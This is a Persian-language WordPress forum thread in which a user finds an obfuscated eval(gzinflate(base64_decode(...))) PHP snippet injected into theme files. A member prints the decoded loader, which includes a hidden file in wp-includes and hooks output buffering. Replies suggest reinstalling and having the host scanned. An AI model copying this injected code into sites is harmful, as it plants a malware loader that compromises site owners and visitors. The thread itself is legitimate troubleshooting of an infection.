انجمن

مشکل کد اضافی تو فایل های قالب !  (۱۲ نوشته)

• moryfun

آفلاین
    عضو
    تعداد نوشته‌ها: ۱۰۲
    # نوشته شده: ۱۲ سال پیش
    ۲۸ تیر ۱۳۹۰ - ۲۳:۲۵

دوستان چی شد که تو همه فایل های قالبم این کد زیر اومده

<?php /*fa23d0177ddff8fce2be2f190a961bc0*/ eval(gzinflate(base64_decode('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')));?>

تو قسمت مدیریت بجز صفحه اول همه خراب میاد بالا !!

• moryfun

آفلاین
    عضو
    ۲۸ تیر ۱۳۹۰ - ۲۳:۳۴

همه رو برداشتم ولی هنوز مشکل مدیریت پابرجاست !!

• Parsa

آفلاین
    عضو فعال
    تعداد نوشته‌ها: ۱۹۲۱
    ۲۹ تیر ۱۳۹۰ - ۰۰:۱۳

احتمالا ويروس هست
    بهتره تمام پلاگينها رو دوباره نصب كنيد
    همچنين وردپرس
    و قالب

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
    moryfun - rock
  • moryfun

آفلاین
    عضو
    ۲۹ تیر ۱۳۹۰ - ۱۱:۲۹

چطوری این کار رو بکنم ؟

• moryfun

آفلاین
    عضو
    ۲۹ تیر ۱۳۹۰ - ۱۲:۱۷

فقط تو ویرایش قالب مشکل هست :
    http://www.uploadtak.com/images/q34szgo8dzd465o6jqg6.gif

• moryfun

آفلاین
    عضو
    ۳۰ تیر ۱۳۹۰ - ۱۶:۰۲

چه کار کنم ؟

• Araz

آفلاین
    کاربر فعال
    تعداد نوشته‌ها: ۱۵۰۴
    ۳۰ تیر ۱۳۹۰ - ۱۸:۳۶

از چه قالبی استفاده می کنید؟

قالب شما توسط نویسنده و یا دیگر افراد ارایه دهنده کد گذاری شده است.
    اگر قالب مورد استفاده تجاری نیست، محتوای فایل footer.php را اینجا قرار دهید.

• Araz

آفلاین
    کاربر فعال
    ۳۰ تیر ۱۳۹۰ - ۲۰:۴۵

محتوای کد:

/*oahjtxozgvoumivvayqqpnoaauogsjvtcgfyherdwhoygaxdun*/ if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/home/maximdow/public_html/test/wp-includes/js/tinymce/themes/advanced/skins/o2k7/img/03f.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

بهتر است پلاگین فوق را غیر فعال کنید و تست کرده و درصورت رفع مشکل آنرا حذف و مجددا نصب کنید.
    (پیشنهاد قبلی بنده درخصوص کدگذاری قالب چندان صحیح نیست)
    بهتر است دوستانی چون آقایان گناهکار و مصطفی نیز در این خصوص راهنمایی کنند.

Saeed Fard - rock
  • Saeed Fard

آفلاین
    ناظم
    تعداد نوشته‌ها: ۹۸۲
    ۳۰ تیر ۱۳۹۰ - ۲۱:۱۱

دوست عزیزم آراز جان فکر نمیکنم اینقدر ها هم که گفتید جدی باشه ها .. و اصلا اروره پلاگین نیست ..

من هم طبق نظره آقا پارسا احتمال میدم که هاست ویروسی شده باشه ،، فقط همین .. دایرکتوری wp-includes ویروسی شده و از ویرایشگر ارور میگیره .. بهتره با سرور تماس گرفته بشه تا هاست اسکن بشه ..

موفق باشید ../.

Araz - rock - moryfun
  • Araz

آفلاین
    کاربر فعال
    ۳۱ تیر ۱۳۹۰ - ۰۰:۰۶

ممنون سعید جان
    من فقط کدی را که دوستمان در صفحه قرار داده بود را باز کردم و خود نیز با محتوای آن آشنا هستید.
    ولی درخصوص امنیتی بودن موضوع من نیز باشما هم عقیده ام.

موفق باشید

moryfun - Saeed Fard
  • moryfun

آفلاین
    عضو
    ۳۱ تیر ۱۳۹۰ - ۱۵:۴۵

از تمام دوستان ممنون !
    ولی دیر جواب دادین باحاتون قهرم :)) !!!
    اون کدا رو از ویرایشگر برداشتم !
    و وردپرس رو دوباره نصبیدم ! ریسک کردن !
    مشکل اون صفحه بد بالا میومد نمی دونم چی بود ؟!؟! ولی کچ مرور گر رو پاک کردم درست شد ! نمیدونم فقط بخواطر کچ بود آخه با یک مرور گر دیگه امتحان کرده بودم ولی خراب بود !!!!!!!!!! !!
    الان مشکلی ندارم ! ولی برای اسکن اقدام میکنم !

• Saeed Fard

آفلاین
    ناظم
    تعداد نوشته‌ها: ۹۸۲
    ۳۱ تیر ۱۳۹۰ - ۱۶:۵۵

از تمام دوستان ممنون !
    ولی دیر جواب دادین باحاتون قهرم :)) !!!

دوست عزیز خب احتمالا یا نبودیم یا تاپیکتون رو ندیدیم که بخوایم جواب بدیم ..

اون کدا رو از ویرایشگر برداشتم !
    و وردپرس رو دوباره نصبیدم ! ریسک کردن !
    مشکل اون صفحه بد بالا میومد نمی دونم چی بود ؟!؟! ولی کچ مرور گر رو پاک کردم درست شد ! نمیدونم فقط بخواطر کچ بود آخه با یک مرور گر دیگه امتحان کرده بودم ولی خراب بود !!!!!!!!!! !!
    الان مشکلی ندارم ! ولی برای اسکن اقدام میکنم !

وردپرس رو دوباره نصب کردن ریسک نیست ، در صورتی که بکاپ کامل داشته باشید ..
    احتمالا در کش(!) مرورگر قسمت های ناقص ذخیره شده بوده .. حتما برای اسکن اقدام کنید ، چون اگه ویروس باشه دوباره مشکل به وجود خواهد آورد ، حتی بدتر از اینها ..

دوست من لطفا آیکون تاپیک رو به حل شده تغییر بدید .. با تشکر ..

موفق باشید ../.

amirsaam - moryfun

درباره‌ی این موضوع

برچسب‌ها